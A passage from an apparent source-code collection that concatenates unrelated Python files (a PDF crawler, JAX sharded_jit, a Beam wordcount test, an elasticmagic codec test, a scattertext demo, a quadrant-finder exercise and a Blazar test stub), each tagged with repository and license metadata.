for i in range(128):
t = threading.Thread(target=crawler, args=(output_folder, excluded))
t.start()
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is main_thread:
continue
t.join()
def crawler(output_folder, excluded=set()):
"""
Thread working function
"""
finished = 0
print "thread %i has started, exclude %i items" %\
(threading.current_thread().ident, len(excluded))
global TASKS
while True:
task = None
try:
task = TASKS.pop()
except IndexError:
print "thread %i finished %i tasks, exiting for no task available"\
% (threading.current_thread().ident, finished)
break
try:
if not task:
break
sbid = task['ScienceBaseID']
# some webLinks__uri looks like:
# http://www.springerlink.com/content/p543611u8317w447/?p=a0e7243d602f4bd3b33b2089b2ed92e4&pi=5 ; http://www.springerlink.com/content/p543611u8317w447/fulltext.pdf
# since both url will redirect to the same url finally, I did not retrieve them twice
url = task['webLinks__uri']
if sbid in excluded:
continue
retrieve(url, sbid, output_folder)
finished += 1
if finished % 20 == 0:
print "%i has finished %i" % (threading.current_thread().ident, finished)
except ExceedMaximumRetryError as e:
log.error("%s\tEXCEED_MAXIMUM_RETRY\t%s" % (e.sbid, e.url))
except Exception as e:
print e, task
log.error("%s\tUNEXPECTED\t%s\t%s" % (sbid, url, e))
def main(argv):
print crawl(argv[1], '/scratch/pdfs')
if __name__ == '__main__':
import sys
main(sys.argv)
| luozhaoyu/deepdive | crawler.py | Python | apache-2.0 | 6,748 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from typing import Callable, Iterable, Optional, Tuple, Union
from absl import logging
import numpy as np
from jax import core
from jax.interpreters import ad
from jax.interpreters import partial_eval as pe
# TODO(skye): separate pmap into it's own module?
from jax.interpreters import mlir
from jax.interpreters import pxla
from jax.interpreters import xla
from jax import linear_util as lu
from jax._src import dispatch
from jax._src.lib import xla_bridge as xb
from jax._src.lib import xla_client as xc
from jax._src.lib.mlir import ir
from jax._src.lib.mlir.dialects import func as func_dialect
from jax._src.api_util import (argnums_partial, flatten_axes, flatten_fun,
_ensure_index_tuple)
import jax._src.util as util
from jax.tree_util import tree_flatten, tree_unflatten
from jax._src.util import (new_name_stack, wrap_name, wraps, safe_map,
safe_zip, HashableFunction)
from jax._src.config import config
xops = xc._xla.ops
def _map(f, *xs):
return tuple(map(f, *xs))
class ResultToPopulate: pass
result_to_populate = ResultToPopulate()
def _avals_to_results_handler(nrep, npart, partitions, out_avals):
handlers = [_aval_to_result_handler(npart, parts, out_aval)
for parts, out_aval in safe_zip(partitions, out_avals)]
def handler(out_bufs):
return [h(bufs) for h, bufs in zip(handlers, out_bufs)]
return handler
def _aval_to_result_handler(npart, parts, aval):
if aval is not core.abstract_unit:
spec = pxla.partitioned_sharding_spec(npart, parts, aval)
indices = pxla.spec_to_indices(aval.shape, spec)
else:
spec = indices = None
return pxla.local_aval_to_result_handler(aval, spec, indices)
@lu.cache
def _sharded_callable(
fun: lu.WrappedFun, nparts: Optional[int],
in_parts: Tuple[pxla.PartitionsOrReplicated, ...],
out_parts_thunk: Callable[[], Tuple[pxla.PartitionsOrReplicated, ...]],
local_in_parts: Optional[Tuple[pxla.PartitionsOrReplicated, ...]],
local_out_parts_thunk: Callable[[], Optional[Tuple[pxla.PartitionsOrReplicated, ...]]],
local_nparts: Optional[int], name: str, *abstract_args):
nrep = 1
if local_in_parts is None:
local_in_parts = in_parts
global_abstract_args = [pxla.get_global_aval(arg, parts, lparts)
for arg, parts, lparts
in safe_zip(abstract_args, in_parts, local_in_parts)]
if logging.vlog_is_on(2):
logging.vlog(2, "abstract_args: %s", abstract_args)
logging.vlog(2, "global_abstract_args: %s", global_abstract_args)
logging.vlog(2, "in_parts: %s", in_parts)
logging.vlog(2, "local_in_parts: %s", local_in_parts)
jaxpr, global_out_avals, consts = pe.trace_to_jaxpr_final(fun, global_abstract_args)
platform = xb.get_backend().platform
if platform not in ["tpu", "gpu"]:
# TODO(skye): fall back to regular jit?
raise ValueError(f"sharded_jit not supported for {platform}")
nparts = pxla.reconcile_num_partitions(jaxpr, nparts)
assert nparts is not None
if nparts > xb.device_count():
raise ValueError(
f"sharded_jit computation requires {nparts} devices, "
f"but only {xb.device_count()} devices are available.")
if xb.local_device_count() < nparts < xb.device_count():
raise NotImplementedError(
f"sharded_jit across multiple hosts must use all available devices. "
f"Got {nparts} out of {xb.device_count()} requested devices "
f"(local device count: {xb.local_device_count()})")
if local_nparts is None:
if nparts > xb.local_device_count():
raise ValueError(
"Specify 'local_nparts' when using cross-process sharded_jit "
"and all inputs and outputs are replicated.")
else:
local_nparts = nparts
if local_nparts > xb.local_device_count():
raise ValueError(
f"sharded_jit computation requires {local_nparts} local devices, "
f"but only {xb.local_device_count()} local devices are available.")
if logging.vlog_is_on(2):
logging.vlog(2, "nparts: %d local_nparts: %d", nparts, local_nparts)
out_parts = out_parts_thunk()
local_out_parts = local_out_parts_thunk()
if local_out_parts is None:
local_out_parts = out_parts
if logging.vlog_is_on(2):
logging.vlog(2, "out_parts: %s", out_parts)
logging.vlog(2, "local_out_parts: %s", local_out_parts)
local_out_avals = [pxla.get_local_aval(out, parts, lparts)
for out, parts, lparts
in safe_zip(global_out_avals, out_parts, local_out_parts)]
log_priority = logging.WARNING if config.jax_log_compiles else logging.DEBUG
logging.log(log_priority,
"Compiling %s for %d devices with args %s.",
fun.__name__, nparts, global_abstract_args)
c = xc.XlaBuilder("spjit_{}".format(fun.__name__))
xla_consts = _map(partial(xla.pyval_to_ir_constant, c), consts)
xla_args = _xla_sharded_args(c, global_abstract_args, in_parts)
axis_env = xla.AxisEnv(nrep, (), ())
ctx = xla.TranslationContext(
c, platform, axis_env, new_name_stack(wrap_name(name, "sharded_jit")))
out_nodes = xla.jaxpr_subcomp(ctx, jaxpr, xla_consts, *xla_args)
out_tuple = xla.with_sharding(c, out_parts, xops.Tuple, c, out_nodes)
built = c.Build(out_tuple)
if nparts <= xb.local_device_count():
devices = xb.local_devices()[:nparts]
else:
assert nparts == xb.device_count()
devices = xb.devices()
device_assignment = np.array([[d for d in devices]])
device_assignment = np.reshape(device_assignment, (-1, nparts))
# device_assignment = None # TODO(skye): replace with default device assignment?
compiled = dispatch.backend_compile(
xb.get_backend(), built,
xb.get_compile_options(nrep, nparts, device_assignment))
input_specs = [
pxla.partitioned_sharding_spec(local_nparts, parts, aval)
for parts, aval in zip(local_in_parts, abstract_args)]
input_indices = [pxla.spec_to_indices(aval.shape, spec)
if spec is not None else None
for aval, spec in zip(abstract_args, input_specs)]
handle_args = partial(pxla.shard_args, compiled.local_devices(),
input_indices)
handle_outs = _avals_to_results_handler(nrep, local_nparts, # type: ignore
local_out_parts, local_out_avals)
return partial(_execute_spatially_partitioned, compiled, handle_args,
handle_outs)
def _sharded_jit_translation_rule(ctx, avals_in, avals_out, *in_nodes,
in_parts, out_parts_thunk, nparts,
name, call_jaxpr, local_in_parts,
local_out_parts_thunk, local_nparts):
subc = xc.XlaBuilder(f"sharded_jit_{name}")
# We assume any extra leading in_nodes are constants and replicate them.
num_extra_nodes = len(in_nodes) - len(in_parts)
assert num_extra_nodes >= 0
in_parts = (None,) * num_extra_nodes + in_parts
args = []
for i, (n, sharding) in enumerate(safe_zip(in_nodes, in_parts)):
# We use xla.set_sharding instead of xla.with_sharding because inlined calls
# shouldn't have shardings set directly on the inputs or outputs.
arg = xla.parameter(subc, i, ctx.builder.GetShape(n))
args.append(xla.set_sharding(subc, arg, sharding))
sub_ctx = ctx.replace(
builder=subc,
name_stack=new_name_stack(wrap_name(name, "sharded_jit")))
out_nodes = xla.jaxpr_subcomp(sub_ctx, call_jaxpr, (), *args)
out_parts = out_parts_thunk()
assert len(out_parts) == len(out_nodes)
out_nodes = [xla.set_sharding(subc, out, sharding)
for out, sharding in safe_zip(out_nodes, out_parts)]
subc = subc.build(xops.Tuple(subc, out_nodes))
return xla.xla_destructure(ctx.builder,
xops.Call(ctx.builder, subc, list(in_nodes)))
def _sharded_jit_lowering(ctx, *in_nodes,
in_parts, out_parts_thunk, nparts,
name, call_jaxpr, local_in_parts,
local_out_parts_thunk, local_nparts):
# We assume any extra leading in_nodes are constants and replicate them.
num_extra_nodes = len(in_nodes) - len(in_parts)
assert num_extra_nodes >= 0
in_parts = (None,) * num_extra_nodes + in_parts
args = []
for ns, sharding in safe_zip(
safe_map(mlir.wrap_singleton_ir_values, in_nodes), in_parts):
if sharding is not None:
args.append(
[mlir.wrap_with_sharding_op(n, xla.sharding_to_proto(sharding))
for n in ns])
else:
args.append(ns)
sub_ctx = ctx.module_context.replace(
name_stack=new_name_stack(wrap_name(name, "sharded_jit")))
fn = mlir.lower_jaxpr_to_fun(sub_ctx, f"sharded_jit_{name}",
core.ClosedJaxpr(call_jaxpr, ()))
output_types = safe_map(mlir.aval_to_ir_types, ctx.avals_out)
flat_output_types = util.flatten(output_types)
call = func_dialect.CallOp(flat_output_types,
ir.FlatSymbolRefAttr.get(fn.name.value),
mlir.flatten_lowering_ir_args(args))
out_nodes = util.unflatten(call.results, safe_map(len, output_types))
out_parts = out_parts_thunk()
outputs = []
for ns, sharding in safe_zip(out_nodes, out_parts):
if sharding is not None:
outputs.append(
[mlir.wrap_with_sharding_op(n, xla.sharding_to_proto(sharding))
for n in ns])
else:
outputs.append(ns)
return outputs
def _execute_spatially_partitioned(compiled, in_handler, out_handler, *args):
input_bufs = in_handler(args)
out_bufs = compiled.execute_sharded_on_local_devices(input_bufs)
return out_handler(out_bufs)
def _xla_sharded_args(c, avals, in_parts):
xla_args = []
for i, (sharding, aval) in enumerate(safe_zip(in_parts, avals)):
param = xla.with_sharding(c, sharding, xla.parameter, c, i,
*xla.aval_to_xla_shapes(aval))
xla_args.append(param)
return xla_args
def _sharded_call_impl(fun, *args, nparts, in_parts, out_parts_thunk,
local_in_parts, local_out_parts_thunk, local_nparts,
name):
compiled_fun = _sharded_callable(fun, nparts, in_parts, out_parts_thunk,
local_in_parts, local_out_parts_thunk,
local_nparts, name,
*map(xla.abstractify, args))
return compiled_fun(*args)
sharded_call_p = core.CallPrimitive("sharded_call")
sharded_call = sharded_call_p.bind
sharded_call_p.def_impl(_sharded_call_impl)
xla.register_translation(sharded_call_p, _sharded_jit_translation_rule)
mlir.register_lowering(sharded_call_p, _sharded_jit_lowering)
class _UnconstrainedPartitionSingleton:
def __str__(self):
return "UNCONSTRAINED"
# Unconstrained sentinel value for PartitionSpec, representing a dimension for
# which the user wants XLA to assign the best partitioning.
# TODO(yashkatariya): May rename to AUTO.
_UNCONSTRAINED_PARTITION = _UnconstrainedPartitionSingleton()
class PartitionSpec(tuple):
"""Tuple of integer specifying how a value should be partitioned.
Each integer corresponds to how many ways a dimension is partitioned. We
create a separate class for this so JAX's pytree utilities can distinguish it
from a tuple that should be treated as a pytree.
"""
def __new__(cls, *partitions):
return tuple.__new__(PartitionSpec, partitions)
def __repr__(self):
return "PartitionSpec%s" % tuple.__repr__(self)
"""A sentinel value representing a dim is unconstrained."""
UNCONSTRAINED = _UNCONSTRAINED_PARTITION
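# Illustrative note (not part of the original module): PartitionSpec(2, 1)
# describes a rank-2 value split two ways along dimension 0 and left whole along
# dimension 1, so the product of its entries (here 2) is the total partition count.
#   spec = PartitionSpec(2, 1)
#   tuple(spec)  # (2, 1)
#   repr(spec)   # 'PartitionSpec(2, 1)'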
def sharded_jit(
fun: Callable,
in_parts,
out_parts,
num_partitions: Optional[int] = None,
local_in_parts=None,
local_out_parts=None,
local_num_partitions=None,
static_argnums: Union[int, Iterable[int]] = (),
):
"""Like ``jit``, but partitions ``fun`` across multiple devices.
WARNING: this feature is still under active development! It may not work well,
and may change without warning!
`sharded_jit` sets up ``fun`` for just-in-time compilation with XLA, but
unlike ``jit``, the compiled function will run across multiple devices
(e.g. multiple GPUs or multiple TPU cores). This is achieved by spatially
partitioning the data that flows through the computation, so each operation is
run across all devices and each device runs only a shard of the full
data. (Some data can optionally be replicated, which is sometimes more
efficient for small arrays when combined with larger spatially-partitioned
arrays.) Communication between devices is automatically inserted as necessary.
``sharded_jit`` can be useful if the jitted version of ``fun`` would not fit
in a single device's memory, or to speed up ``fun`` by running each operation
in parallel across multiple devices.
Note: ``sharded_jit`` is currently available on TPU only!
Args:
fun: Function to be jitted.
in_parts: Specifications for how each argument to ``fun`` should be
partitioned or replicated. This should be a PartitionSpec indicating into
how many partitions each dimension should be sharded, ``None`` indicating
replication, or (nested) standard Python containers thereof. For example,
``in_parts=PartitionSpec(2,1)`` means all arguments should be partitioned
over two devices across the first dimension;
``in_parts=(PartitionSpec(2,2), PartitionSpec(4,1), None)`` means the
first argument should be partitioned over four devices by splitting both
of its dimensions in half, the second argument should be partitioned over
the four devices across the first dimension, and the third argument is
replicated across the four devices.
All PartitionSpecs in a given ``sharded_jit`` call must correspond to the
same total number of partitions, i.e. the product of all PartitionSpecs
must be equal, and the number of dimensions in the PartitionSpec
corresponding to an array ``a`` should equal ``a.ndim``. Arguments marked
as static using ``static_argnums`` (see below) do not require a
PartitionSpec.
out_parts: The output partitions, i.e. how each output of ``fun`` should be
partitioned or replicated. This follows the same convention as
``in_parts``.
num_partitions: Optional. If set, explicitly specifies the number of devices
      ``fun`` should be partitioned across (rather than inferring it from
``in_parts``, ``out_parts``, and/or any ``with_sharding_constraint``
calls). Setting this should usually be unnecessary, but can be used to
maintain device persistence across multiple sharded_jit calls when some of
those calls only involve replicated values.
local_in_parts: Optional. This should be set when partitioning across
multiple processes, and says how each process's worth of data should be
partitioned (vs. in_parts which is the "global" partitioning across all
processes). This API is likely to change in the future.
local_out_parts: Optional. This should be set when partitioning across
multiple processes, and says how each process's worth of data should be
partitioned (vs. out_parts which is the "global" partitioning across all
processes). This API is likely to change in the future.
    local_num_partitions: Optional. Explicitly specifies the number of local
      devices to partition across in a multi-process setting. This API is
likely to change in the future.
static_argnums: An int or collection of ints specifying which positional
arguments to treat as static (compile-time constant). Operations that only
depend on static arguments will be constant-folded. Calling the jitted
function with different values for these constants will trigger
recompilation. If the jitted function is called with fewer positional
arguments than indicated by ``static_argnums`` then an error is raised.
Each of the static arguments will be broadcasted to all devices, and
cannot be partitioned - these arguments will be removed from the *args
list before matching each remaining argument with its corresponding
PartitionSpec. Arguments that are not arrays or containers thereof must
be marked as static. Defaults to ``()``.
Returns:
A version of ``fun`` that will be distributed across multiple devices.
"""
if num_partitions is not None:
nparts = num_partitions
else:
nparts = pxla.get_num_partitions(in_parts, out_parts)
if local_num_partitions is not None:
local_nparts = local_num_partitions
else:
local_nparts = pxla.get_num_partitions(local_in_parts, local_out_parts)
static_argnums = _ensure_index_tuple(static_argnums)
@wraps(fun)
def wrapped(*args, **kwargs):
if kwargs:
raise NotImplementedError("sharded_jit over kwargs not yet supported")
f = lu.wrap_init(fun)
if static_argnums:
if max(static_argnums) >= len(args):
raise ValueError(
f"jitted function has static_argnums={static_argnums}"
f" but was called with only {len(args)} positional "
f"argument{'s' if len(args) > 1 else ''}. "
"All static broadcasted arguments must be passed positionally.")
dyn_argnums = [i for i in range(len(args)) if i not in static_argnums]
f, args = argnums_partial(f, dyn_argnums, args)
args_flat, in_tree = tree_flatten((args, kwargs))
in_parts_flat = tuple(flatten_axes("sharded_jit in_parts",
in_tree.children()[0], in_parts))
if local_in_parts is not None:
local_in_parts_flat = tuple(flatten_axes("sharded_jit local_in_parts",
in_tree.children()[0], local_in_parts))
else:
local_in_parts_flat = None
flat_fun, out_tree = flatten_fun(f, in_tree)
# TODO(skye): having a function-typed param in a primitive seems dicey, is
# there a better way?
out_parts_thunk = HashableFunction(
lambda: tuple(flatten_axes("sharded_jit out_parts", out_tree(), out_parts)),
closure=out_parts)
if local_out_parts:
local_out_parts_thunk = HashableFunction(
lambda: tuple(flatten_axes("sharded_jit local_out_parts",
out_tree(), local_out_parts)),
closure=local_out_parts)
else:
local_out_parts_thunk = HashableFunction(lambda: None, closure=None)
out = sharded_call(
flat_fun,
*args_flat,
nparts=nparts,
in_parts=in_parts_flat,
out_parts_thunk=out_parts_thunk,
local_in_parts=local_in_parts_flat,
local_out_parts_thunk=local_out_parts_thunk,
local_nparts=local_nparts,
name=flat_fun.__name__)
return tree_unflatten(out_tree(), out)
return wrapped
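# Usage sketch (illustrative only, assuming two TPU cores are available; not part
# of the original module):
#   from functools import partial
#   import jax.numpy as jnp
#
#   @partial(sharded_jit,
#            in_parts=PartitionSpec(2, 1),  # shard dim 0 of the argument in two
#            out_parts=None)                # replicate the output
#   def f(x):
#     return jnp.sum(x, axis=0)
#
#   y = f(jnp.ones((8, 4)))  # each core computes on a (4, 4) shard of x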
def _sharding_constraint_impl(x, partitions):
# TODO(skye): can we also prevent this from being called in other
# non-sharded_jit contexts? (e.g. pmap, control flow)
raise NotImplementedError(
"with_sharding_constraint() should only be called inside sharded_jit()")
def _sharding_constraint_translation_rule(ctx, avals_in, avals_out, x_node,
partitions):
return [xla.set_sharding(ctx.builder, x_node, partitions)]
sharding_constraint_p = core.Primitive("sharding_constraint")
sharding_constraint_p.def_impl(_sharding_constraint_impl)
sharding_constraint_p.def_abstract_eval(lambda x, partitions: x)
ad.deflinear2(sharding_constraint_p,
lambda ct, _, partitions: (with_sharding_constraint(ct, partitions),))
xla.register_translation(sharding_constraint_p,
_sharding_constraint_translation_rule)
def _sharding_constraint_lowering(ctx, x_node, partitions):
return [mlir.wrap_with_sharding_op(x_node, xla.sharding_to_proto(partitions))]
mlir.register_lowering(sharding_constraint_p, _sharding_constraint_lowering)
def with_sharding_constraint(x, partitions: Optional[PartitionSpec]):
"""Identity-like function that specifies how ``x`` should be sharded.
WARNING: this feature is still under active development! It may not work well,
and may change without warning!
This should only be called inside a function transformed by ``sharded_jit``.
It constrains how the function is sharded: regardless of any other specified
partitions, the compiler will make sure that ``x`` is sharded according to
``partitions``. Note that a ``with_sharding_constraint`` call doesn't
necessarily correspond to a reshard, since the compiler is free to achieve
this sharding as long as the constraint is met, e.g. it might insert a reshard
earlier in the computation. Another way to think of this is that the
``with_sharding_constraint`` call may flow "up" the function to preceding
operations as well as "down" to subsequent ones.
``partitions`` must correspond to the same number of total partitions dictated
by the outer ``sharded_jit`` and any other ``with_sharding_constraint`` calls.
In the case where only replication has been specified, any ``partitions`` are
valid.
Example usage:
    @partial(sharded_jit, in_parts=None, out_parts=None, num_partitions=2)
def f(x):
y = x + 1
y = with_sharding_constraint(y, PartitionSpec(2,1))
return y * 2
In this example, the inputs and outputs of ``f`` will be replicated, but the
inner value of ``y`` will be partitioned in half. ``f`` will run on two
devices due to the with_sharding_constraint call.
Args:
x: Array value
partitions: PartitionSpec indicating how ``x`` should be partitioned, or
None for replication.
Returns:
A new version of ``x`` with the specified sharding applied.
"""
return sharding_constraint_p.bind(x, partitions=partitions)
| google/jax | jax/interpreters/sharded_jit.py | Python | apache-2.0 | 22,527 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""End-to-end test for the streaming wordcount example."""
from __future__ import absolute_import
import logging
import unittest
import uuid
from builtins import range
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples import streaming_wordcount
from apache_beam.io.gcp.tests.pubsub_matcher import PubSubMessageMatcher
from apache_beam.runners.runner import PipelineState
from apache_beam.testing import test_utils
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
INPUT_TOPIC = 'wc_topic_input'
OUTPUT_TOPIC = 'wc_topic_output'
INPUT_SUB = 'wc_subscription_input'
OUTPUT_SUB = 'wc_subscription_output'
DEFAULT_INPUT_NUMBERS = 500
WAIT_UNTIL_FINISH_DURATION = 6 * 60 * 1000 # in milliseconds
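# Test flow, in outline: setUp() provisions uniquely named Pub/Sub topics and
# subscriptions, the test publishes DEFAULT_INPUT_NUMBERS messages to the input
# topic, runs the streaming wordcount pipeline against the input subscription, and
# verifies both that the pipeline reaches the RUNNING state and that the expected
# "<n>: 1" messages arrive on the output subscription; tearDown() then removes the
# Pub/Sub resources.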
class StreamingWordCountIT(unittest.TestCase):
def setUp(self):
self.test_pipeline = TestPipeline(is_integration_test=True)
self.project = self.test_pipeline.get_option('project')
self.uuid = str(uuid.uuid4())
# Set up PubSub environment.
from google.cloud import pubsub
self.pub_client = pubsub.PublisherClient()
self.input_topic = self.pub_client.create_topic(
self.pub_client.topic_path(self.project, INPUT_TOPIC + self.uuid))
self.output_topic = self.pub_client.create_topic(
self.pub_client.topic_path(self.project, OUTPUT_TOPIC + self.uuid))
self.sub_client = pubsub.SubscriberClient()
self.input_sub = self.sub_client.create_subscription(
self.sub_client.subscription_path(self.project, INPUT_SUB + self.uuid),
self.input_topic.name)
self.output_sub = self.sub_client.create_subscription(
self.sub_client.subscription_path(self.project, OUTPUT_SUB + self.uuid),
self.output_topic.name,
ack_deadline_seconds=60)
def _inject_numbers(self, topic, num_messages):
"""Inject numbers as test data to PubSub."""
logging.debug('Injecting %d numbers to topic %s', num_messages, topic.name)
for n in range(num_messages):
      self.pub_client.publish(topic.name, str(n).encode('utf-8'))
def tearDown(self):
test_utils.cleanup_subscriptions(self.sub_client,
[self.input_sub, self.output_sub])
test_utils.cleanup_topics(self.pub_client,
[self.input_topic, self.output_topic])
@attr('IT')
def test_streaming_wordcount_it(self):
# Build expected dataset.
expected_msg = [('%d: 1' % num).encode('utf-8')
for num in range(DEFAULT_INPUT_NUMBERS)]
# Set extra options to the pipeline for test purpose
state_verifier = PipelineStateMatcher(PipelineState.RUNNING)
pubsub_msg_verifier = PubSubMessageMatcher(self.project,
self.output_sub.name,
expected_msg,
timeout=400)
extra_opts = {'input_subscription': self.input_sub.name,
'output_topic': self.output_topic.name,
'wait_until_finish_duration': WAIT_UNTIL_FINISH_DURATION,
'on_success_matcher': all_of(state_verifier,
pubsub_msg_verifier)}
# Generate input data and inject to PubSub.
self._inject_numbers(self.input_topic, DEFAULT_INPUT_NUMBERS)
# Get pipeline options from command argument: --test-pipeline-options,
# and start pipeline job by calling pipeline main function.
streaming_wordcount.run(
self.test_pipeline.get_full_options_as_args(**extra_opts),
save_main_session=False)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| RyanSkraba/beam | sdks/python/apache_beam/examples/streaming_wordcount_it_test.py | Python | apache-2.0 | 4,580 |
import unittest
from elasticmagic.types import Integer, Float, Boolean
from elasticmagic.ext.queryfilter.codec import SimpleCodec
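# The decode() assertions below illustrate SimpleCodec's contract: a query key such
# as 'price__gte' splits into a filter name ('price') and an operation ('gte',
# defaulting to 'exact'), each raw value splits on ':' into a list, optional types
# (Integer, Float, Boolean) coerce the pieces, 'null' maps to None, and values that
# fail coercion are dropped.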
class SimpleCodecTest(unittest.TestCase):
def test_decode(self):
codec = SimpleCodec()
self.assertEqual(
codec.decode({'country': ['ru', 'ua', 'null']}),
{
'country': {
'exact': [['ru'], ['ua'], [None]],
}
}
)
self.assertEqual(
codec.decode({'category': ['5', '6:a', 'b:c', 'null']}, {'category': [Integer]}),
{
'category': {
'exact': [[5], [6, 'a'], [None]]
}
}
)
self.assertEqual(
codec.decode({'manu': ['1:nokia:true', '2:samsung:false']}, {'manu': [Integer, None, Boolean]}),
{
'manu': {
'exact': [[1, 'nokia', True], [2, 'samsung', False]],
}
}
)
self.assertEqual(
codec.decode({'is_active': ['true']}, {'is_active': Boolean}),
{
'is_active': {
'exact': [[True]],
}
}
)
self.assertEqual(
codec.decode([('price__gte', ['100.1', '101.0']), ('price__lte', ['200'])], {'price': Float}),
{
'price': {
'gte': [[100.1], [101.0]],
'lte': [[200.0]],
}
}
)
self.assertEqual(
codec.decode({'price__lte': '123a:bc'}, {'price': [Float]}),
{}
)
self.assertRaises(TypeError, lambda: codec.decode(''))
| popravich/elasticmagic | tests/test_codec.py | Python | apache-2.0 | 1,724 |
from transformers import RobertaTokenizerFast
import scattertext as st
tokenizer_fast = RobertaTokenizerFast.from_pretrained(
"roberta-base", add_prefix_space=True)
tokenizer = st.RobertaTokenizerWrapper(tokenizer_fast)
df = st.SampleCorpora.ConventionData2012.get_data().assign(
    parse=lambda df: df.text.apply(tokenizer.tokenize)
)
corpus = st.OffsetCorpusFactory(
df,
category_col='party',
parsed_col='parse',
feat_and_offset_getter=st.TokenFeatAndOffsetGetter()
).build()
# Remove words occur less than 5 times
corpus = corpus.remove_infrequent_words(5, non_text=True)
plot_df = corpus.get_metadata_freq_df('').assign(
Y=lambda df: df.democrat,
X=lambda df: df.republican,
Ypos=lambda df: st.Scalers.dense_rank(df.Y),
Xpos=lambda df: st.Scalers.dense_rank(df.X),
SuppressDisplay=False,
ColorScore=lambda df: st.Scalers.scale_center_zero(df.Ypos - df.Xpos),
)
html = st.dataframe_scattertext(
corpus,
plot_df=plot_df,
category='democrat',
category_name='Democratic',
not_category_name='Republican',
width_in_pixels=1000,
suppress_text_column='Display',
metadata=corpus.get_df()['speaker'],
use_non_text_features=True,
ignore_categories=False,
use_offsets=True,
unified_context=False,
color_score_column='ColorScore',
left_list_column='ColorScore',
    y_label='Democrats',
x_label='Republicans',
header_names={'upper': 'Top Democratic', 'lower': 'Top Republican', 'right': 'Most Frequent'},
subword_encoding='RoBERTa'
)
fn = 'roberta_sentence_piece.html'
with open(fn, 'w') as of:
of.write(html)
print("Open ./" + fn + ' in Chrome.')
| JasonKessler/scattertext | demo_tokenizer_roberta.py | Python | apache-2.0 | 1,670 |
# Brandon Michael
# cis142
# checkForQuadrant.py
# Goal: This program will keep asking for input values to check for the quadrant position,
# origin, x-axis, and y-axis positions
# Notes: I used a while loop to make testing values easier, and I used the x,y input format
# Display program instructions
print("###################################################")
print("Quadrant Finder 1.0")
print("Enter the x and y coordinates to find the quadrant!")
print("Type [exit] to quit the program")
print("###################################################")
# Setup the x and y variables
xValue = None
yValue = None
# Setup a loop that breaks when you type exit
while True:
# Get the input values in a X,Y format
inputCoordinates = input("Type in coordinates [x,y]: ")
# Check if exit was typed, if so then exit the loop and end
if inputCoordinates == "exit":
break # stops the loop
# We want to make sure we can only strip out 2 input values
# and make sure there is a comma separating them
    elif len(inputCoordinates.strip().split(',')) == 2 and inputCoordinates.count(',') == 1:
        # Reset the stored values so each new coordinate pair starts fresh
        xValue = None
        yValue = None
        # Loop over the two numbers that are stripped out by the comma value
        for coordinate in inputCoordinates.strip().split(','):
# This checks to see if we have set a value for x
# If it is still set to None then the first value is going to be xValue
if xValue is None:
xValue = int(coordinate)
# Since we are checking the xValue we can assume when the loop comes back
# a second time we can set it to yValue
else:
yValue = int(coordinate)
# If its a 0,0 value then its the Origin
if xValue == 0 and yValue == 0:
print("Origin")
else:
        # If x = 0 and y is greater or less than 0, it's on the Y axis
if xValue == 0 and (yValue < 0 or yValue > 0):
print("Y - Axis")
        # If x is greater or less than 0 and y = 0, it's on the X axis
elif (xValue < 0 or xValue > 0) and yValue == 0:
print("X - Axis")
# Anything else and we need to check for quadrants
else:
            # If x is a positive number and y is a positive number then it's in Quadrant I
            if xValue > 0 and yValue > 0:
                print("Quadrant I")
            # If x is a negative number and y is a positive number then it's in Quadrant II
            elif xValue < 0 and yValue > 0:
                print("Quadrant II")
            # If x is a negative number and y is a negative number then it's in Quadrant III
            elif xValue < 0 and yValue < 0:
                print("Quadrant III")
            # If x is a positive number and y is a negative number then it's in Quadrant IV
            elif xValue > 0 and yValue < 0:
                print("Quadrant IV")
# If they typed anything but 2 numbers separated by a comma then ask for the input again
else:
print("Please type the input value as x,y")
print("Example: 1,-9")
| bwmichael/jccc-cis142-python | old/check-quadrant.py | Python | apache-2.0 | 3,124 |
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import ddt
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from oslo_config import cfg
from oslo_config import fixture as conf_fixture
import testtools
from blazar import context
from blazar.db import api as db_api
from blazar.db import exceptions as db_exceptions
from blazar.db import utils as db_utils
from blazar.manager import exceptions as manager_exceptions
from blazar.manager import service
from blazar.plugins import oshosts as plugin
from blazar.plugins.oshosts import host_plugin
from blazar import tests
from blazar.utils.openstack import base
from blazar.utils.openstack import nova
from blazar.utils.openstack import placement
from blazar.utils import trusts
CONF = cfg.CONF
class AggregateFake(object):
def __init__(self, i, name, hosts):
self.id = i
self.name = name
self.hosts = hosts
class PhysicalHostPluginSetupOnlyTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostPluginSetupOnlyTestCase, self).setUp()
self.cfg = self.useFixture(conf_fixture.Config(CONF))
self.cfg.config(os_admin_username='fake-user')
self.cfg.config(os_admin_password='fake-passwd')
self.cfg.config(os_admin_user_domain_name='fake-user-domain')
self.cfg.config(os_admin_project_name='fake-pj-name')
